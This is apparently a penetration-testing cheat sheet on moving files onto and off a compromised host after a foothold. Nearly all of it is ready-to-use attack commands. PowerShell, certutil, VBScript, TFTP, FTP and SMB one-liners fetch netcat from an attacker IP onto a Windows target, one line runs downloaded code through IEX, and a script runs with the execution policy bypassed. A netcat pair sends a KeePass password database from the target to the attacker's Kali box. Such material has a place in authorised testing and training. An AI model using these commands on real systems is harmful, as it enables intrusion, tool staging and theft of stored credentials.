Transferring Files

How to transfer files
There are various ways to transfer files once an initial foot has been made. 
HTTP
The simplest way to transfer files from one box to another is by using Python SimpleHTTPServer module as can be seen below:
python -m SimpleHTTPServer <port number>
Powershell
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.10.20/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.10.20/nc.exe -Destination C:\temp\nc.exe")
powershell wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.20/nc.exe')" 
echo $storageDir = $pwd > wget1.ps1
echo $webclient = New-Object System.Net.WebClient >> wget1.ps1
echo $url = "http://10.10.10.20/nc.exe" >> wget1.ps1
echo $file = "new-nc.exe" >> wget1.ps1
echo $webclient.DownloadFile($url,$file) >> wget1.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget1.ps1
Certutil
certutil.exe -urlcache -split -f "http://10.10.10.20/nc.exe" c:\temp\nc.exe
VBScript
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
TFTP
On Linux:
mkdir /tftp
atftpd --daemon --port 69 ~/tftp
​
On Windows:
tftp -i 10.10.10.20 GET nc.exe
FTP
Install it first and start service
apt-get install pure-ftpd
service pure-ftpd start
Set up the attacking machine
 On the target machine run:
echo open 10.10.10.32 21> ftp1.txt        <--- Attacking IP
echo username>> ftp1.txt                  <--- Your username
echo password>> ftp1.txt                  <--- Your password
echo binary>> ftp1.txt		
echo GET executable.exe>> ftp1.txt
echo bye>> ftp1.txt
ftp -s:ftp1.txt
SMB
On Kali-Linux:
python /usr/share/doc/python-impacket/examples/smbserver.py dir-name .
python3 /usr/share/doc/python3-impacket/examples/smbserver.py dir-name .
​
On Windows:
copy \\KALI_IP\dir-name\name_of_the_file_you_want_to_transfer .
Base64 transfer binaries
# On target
base64 -w0 /path/to/binary    <-- copy the content and save into a .b64 file.
​
# On my kali
base64 -d filename.bs64 > mybinary
chmod +x mybinary
Windows to Linux
### On a Windows Target ###
​
nc.exe -v -w 30 -p 4444 -l < some_password.kdbx
listening on [any] 4444 ...
​
​
### ON MY KALI ###
​
nc -v -w 2 TARGET_IP 4444 > password.kdbx
TARGET_IP [TARGET_IP ] 4444 (?) open
​
Postgresl
Metasploit Framework
Last modified 1yr ago